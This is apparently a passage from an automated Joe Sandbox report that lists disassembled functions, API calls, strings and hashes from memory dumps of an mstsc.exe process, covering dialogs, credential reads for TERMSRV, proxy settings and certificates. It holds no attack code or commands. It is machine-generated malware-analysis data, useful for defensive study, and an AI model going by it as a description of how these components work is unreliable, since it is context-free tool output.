                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 009611D9
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000139F,0000040A,00000001,00000023,?,00000000,?,00000002), ref: 00961222
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0096122D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$ErrorLastMessageMetricsSystem$DialogPostSendShowTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3391194569-0
                                                                                                                                                                                    • Opcode ID: 2576428fc0e93274a36b6724b1e79f9ab282fd39acc10e3cf8dfc1d8b7615997
                                                                                                                                                                                    • Instruction ID: d74631e67e19b64b8597ba6432f944bf8af2d9a09d8217fe50d4f5b818d49548
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2576428fc0e93274a36b6724b1e79f9ab282fd39acc10e3cf8dfc1d8b7615997
                                                                                                                                                                                    • Instruction Fuzzy Hash: D341C4B1218301BFEB189F64DD9AF3637A9EB49701F09411CFA06D65A1CBB4DC90EB61
                                                                                                                                                                                    Function 00935893 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003309), ref: 009358A7
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(00000000,00003310,?,0093582B,?,00000000), ref: 009358C0
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003309), ref: 00935945
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0093594C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040A,00000001,00000000), ref: 00935964
                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 00935971
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 0093598C
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000001,?), ref: 009359A5
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003309), ref: 009359BB
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 009359C2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Item$EnableWindow$ButtonChecked
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1728075932-0
                                                                                                                                                                                    • Opcode ID: 8c07a64b21e2ef11943a576f67d4be300acc4bfb7376a0dca6cfd6a9f2bdffe1
                                                                                                                                                                                    • Instruction ID: ebe75ea67ab258df6b94911eb4f09d35b4a01f6a32cf48d4cdcbe7429bd91a93
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c07a64b21e2ef11943a576f67d4be300acc4bfb7376a0dca6cfd6a9f2bdffe1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB310471204704EFDB109F11CC99FBA3769EF89724F524029FA45AF1A0DBB1A902DF50
                                                                                                                                                                                    Function 0091E0FD Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 368COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000100), ref: 0091E3F1
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0091E368
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Setting Remote Application's Name Failed!, xrefs: 0091E1BC
                                                                                                                                                                                    • Setting Remote Application's Program!, xrefs: 0091E20F
                                                                                                                                                                                    • _msReconnect, xrefs: 0091E2C8
                                                                                                                                                                                    • AddRemoteApplicationToQueueUi failed!, xrefs: 0091E4B7
                                                                                                                                                                                    • Setting Remote Application's Arguments!, xrefs: 0091E262
                                                                                                                                                                                    • GetTSRemoteApplication failed, xrefs: 0091E160
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeMessageTrace$AddressErrorHandleLastLibraryModuleProcString
                                                                                                                                                                                    • String ID: AddRemoteApplicationToQueueUi failed!$GetTSRemoteApplication failed$Setting Remote Application's Arguments!$Setting Remote Application's Name Failed!$Setting Remote Application's Program!$_msReconnect
                                                                                                                                                                                    • API String ID: 3800867429-3388236451
                                                                                                                                                                                    • Opcode ID: fa0dc7036cac769e14185538ae754299b99793ef7995e783a4bf0cf8d20deea3
                                                                                                                                                                                    • Instruction ID: 7e4bdde59851fb30806668259586997101ad67de77efd28587c8ac2b495566af
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0dc7036cac769e14185538ae754299b99793ef7995e783a4bf0cf8d20deea3
                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD19F71708348AFDB29DF14C899FA637EAAB89304F14486DFD459B2A2DA70DCC1DB11
                                                                                                                                                                                    Function 00959248 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 213COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009592D7
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009592E1
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    • CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009593A5
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009593AF
                                                                                                                                                                                    • CredFree.ADVAPI32(00000000,?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009594E6
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00959EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009594F1
                                                                                                                                                                                      • Part of subcall function 0095B1E5: memset.MSVCRT ref: 0095B20A
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0095B23A
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0095B242
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0095B24F
                                                                                                                                                                                      • Part of subcall function 0095AA6B: LocalAlloc.KERNEL32(00000040,0000004C,00000000,00000100,?,TERMSRV,?), ref: 0095AA8A
                                                                                                                                                                                      • Part of subcall function 0095AA6B: LocalFree.KERNEL32(00000000,00000000), ref: 0095ACB7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$CredLocal$ConditionErrorLastMaskRead$AddressAllocHandleInfoLibraryMessageModuleProcTraceVerifyVersionmemset
                                                                                                                                                                                    • String ID: GetTargetForExtednedCredential failed$StringCchCopy failed!
                                                                                                                                                                                    • API String ID: 1625013499-3322908828
                                                                                                                                                                                    • Opcode ID: a32057ce54fc74a086d25098d251cf7ab05a237318f6bbe38334092e80fae9b0
                                                                                                                                                                                    • Instruction ID: c365d4ff2670e6581e2209b824895c0da7c71bb63921496fbc88bbcc65904135
                                                                                                                                                                                    • Opcode Fuzzy Hash: a32057ce54fc74a086d25098d251cf7ab05a237318f6bbe38334092e80fae9b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C710772A14364FFEB35CF5AD849F6A3AA9AB45315F054088FC00AB5B1C375CC89EB91
                                                                                                                                                                                    Function 0094504C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: CreateItemMoniker failed$GetRunningObjectTable$QI(IMsRdpDeviceCollection2)$ROT->Register$dynusb:%d
                                                                                                                                                                                    • API String ID: 2296332203-1013186652
                                                                                                                                                                                    • Opcode ID: c55905bd849b5c0e454f69087bea65636e1a06078d7719a22e35b1c574d689be
                                                                                                                                                                                    • Instruction ID: e3ef4d05af560438eda3dca9177befa27131e78c98c8e4b5da23bb797b6cf113
                                                                                                                                                                                    • Opcode Fuzzy Hash: c55905bd849b5c0e454f69087bea65636e1a06078d7719a22e35b1c574d689be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6661C471A487186FDB25CFD4CC88FA57BA9AB49314F0A019DF944A72A2C7B0DC80DF91
                                                                                                                                                                                    Function 00949C85 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 164registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,ProxyName,00000000,?,?,00000000), ref: 00949D93
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,AllowExplicitProxyName,00000000,00000000,?,00000004), ref: 00949E11
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: AllowExplicitProxyName$ProxyName$hGPKey$isEnforcedByGP$isGPDefined$proxyHostName
                                                                                                                                                                                    • API String ID: 1819154049-3315540633
                                                                                                                                                                                    • Opcode ID: 0e143c3aa5055dd0bd8685584819032c45f98eb919510be24aae25e0c3f8ec71
                                                                                                                                                                                    • Instruction ID: f4e780166bcf4ea04763fe5a63a5d99d328a9561e4d2eedeba13d225e09bf74b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e143c3aa5055dd0bd8685584819032c45f98eb919510be24aae25e0c3f8ec71
                                                                                                                                                                                    • Instruction Fuzzy Hash: F251EE32A08384BEDB2ACF54D848F673BAAAB45714F1540DDF941AB1E2C771CD80EB91
                                                                                                                                                                                    Function 009148D4 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • MstscRemoteSessionsMgrWndClass, xrefs: 009149EE
                                                                                                                                                                                    • Initialization of queued apps linked list failed!, xrefs: 0091496A
                                                                                                                                                                                    • Initialization of transaction linked list failed!, xrefs: 00914915
                                                                                                                                                                                    • Failed to register window class, xrefs: 009149B7
                                                                                                                                                                                    • m_cs.Init failed, xrefs: 00914A90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: Failed to register window class$Initialization of queued apps linked list failed!$Initialization of transaction linked list failed!$MstscRemoteSessionsMgrWndClass$m_cs.Init failed
                                                                                                                                                                                    • API String ID: 4061214504-3798914471
                                                                                                                                                                                    • Opcode ID: 7d0337835ecdd9e481c047959e444ffb174486e59e68ca5a14b4c5d700ad747c
                                                                                                                                                                                    • Instruction ID: 3260e7637af86937e1f60687e375bfa14010c2fc95d9204ed2a34a989cdd2004
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0337835ecdd9e481c047959e444ffb174486e59e68ca5a14b4c5d700ad747c
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41D4327983586FD72ACB54C909FE67AD9AF4D310F070148FD40AB1A2C7A0DCC0AB99
                                                                                                                                                                                    Function 00949ACF Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 148registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,UseProxy,00000000,00000000,?,?), ref: 00949BDD
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,AllowExplicitUseProxy,00000000,00000000,?,00000004), ref: 00949C64
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                    • String ID: AllowExplicitUseProxy$UseProxy$hGPKey$isEnforcedByGP$isGPDefined$pProxyUsage
                                                                                                                                                                                    • API String ID: 3660427363-3121813369
                                                                                                                                                                                    • Opcode ID: 5be6e15ba5b93559cc8e5c698567a0407b19f85418889d67249f292eaf2eea6d
                                                                                                                                                                                    • Instruction ID: e2c01bb9b8d761f5a3cbb8967b1d9aa371194b3dda8f99fb68e78699830adc78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be6e15ba5b93559cc8e5c698567a0407b19f85418889d67249f292eaf2eea6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551EF71A04344AFCB2ACF49E848F5B7FE9EB45304F0540E9F946AB1A2C6B0CD40DB91
                                                                                                                                                                                    Function 009481AE Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0000020A,?,00000000,00000000), ref: 0094822A
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 00948357
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocal$AddressAllocHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: GetMUIHandle$LoadString$StringCchPrintf$allocate memory for resultStr
                                                                                                                                                                                    • API String ID: 139613657-1679347992
                                                                                                                                                                                    • Opcode ID: 65f483075e537be392fcfc2051cc81c3d82a0d4b0a8b65927a842505c700e456
                                                                                                                                                                                    • Instruction ID: d9e85f5f634dc2886f6a342a0addd6f8f73bf6f1f0cbdf1e500d73784e10ae63
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65f483075e537be392fcfc2051cc81c3d82a0d4b0a8b65927a842505c700e456
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03411832A083586FDB399F54DD49F6B7AAAAF85B50F050488F944A71B2CFB4CC40EB51
                                                                                                                                                                                    Function 0095682F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 129memoryencryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CertGetCertificateContextProperty.CRYPT32(?,00000003,?,?), ref: 00956882
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009568AF
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009568DB
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 009568F7
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 00956951
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$AllocCertCertificateContextLocalPropertymemcpy
                                                                                                                                                                                    • String ID: *ppThumbprint$GetCertificateThumbPrint failed$d
                                                                                                                                                                                    • API String ID: 4217741636-268901519
                                                                                                                                                                                    • Opcode ID: bf5db0ca836e4f5734d2b1d9ddc7c71efcca685d416160860ebf7bab1031b267
                                                                                                                                                                                    • Instruction ID: 0a77aaeb84a61499118db0aed0f17472e8742e0668b25e0b6a48828235cd6ecc
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf5db0ca836e4f5734d2b1d9ddc7c71efcca685d416160860ebf7bab1031b267
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2414372618300AFCB25DF25D815F267BE9AB88315F14405DFD80AB2A2C671DC48EF92
                                                                                                                                                                                    Function 022D7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 022F3F12
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 022FE2FB
                                                                                                                                                                                    • ExecuteOptions, xrefs: 022F3F04
                                                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 022FE345
                                                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 022F3F75
                                                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 022F3F4A
                                                                                                                                                                                    • Execute=1, xrefs: 022F3F5E
                                                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 022F3EC4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                    • API String ID: 3901378454-484625025
                                                                                                                                                                                    • Opcode ID: 003d1c675c8aa8387d06b3d9e9d7eeac5236ef4704797d188ff83bcb7be998c3
                                                                                                                                                                                    • Instruction ID: a4f8308f00dea4cce5bb0455dc7fa67ad2e12ac50d7c3e043a1d3582e9c3758a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 003d1c675c8aa8387d06b3d9e9d7eeac5236ef4704797d188ff83bcb7be998c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: C64107716A030DBFEF20DAD4DC95FEAB3BCAF14704F0005A9E645E6084EB749A458F61
                                                                                                                                                                                    Function 0095B330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0095B349
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0095B3A5
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000100), ref: 0095B430
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000100), ref: 0095B438
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: HomeGroupUser$$PWSTR
                                                                                                                                                                                    • API String ID: 1240124958-672385545
                                                                                                                                                                                    • Opcode ID: a97e59f33343255292d3f79d0f335ef13ab6035d7fd08e26b624bebc768bce70
                                                                                                                                                                                    • Instruction ID: b0d7e0033d3ed5c6d36d74e79088166e4e40ba9023b7971ef184d07befc8965b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a97e59f33343255292d3f79d0f335ef13ab6035d7fd08e26b624bebc768bce70
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21E1326083016EE739DF269C45F3A769DDB86326F15006EFC00A71F2CBA0CC48AB91
                                                                                                                                                                                    Function 00916497 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 009164E1
                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00916506
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0091651E
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 00916525
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: System$Metrics$ByteCharInfoMultiParametersWide
                                                                                                                                                                                    • String ID: ($DISPLAY$h$h
                                                                                                                                                                                    • API String ID: 1415089127-1312831404
                                                                                                                                                                                    • Opcode ID: 987be12cc315e71f8cd2f357d3c54877b4aec39bc5180682354b024312c748ee
                                                                                                                                                                                    • Instruction ID: d504005c713ae8ff8ccdf82ff26f7f5633d9e8b300a2f01b7ac79b58fb533484
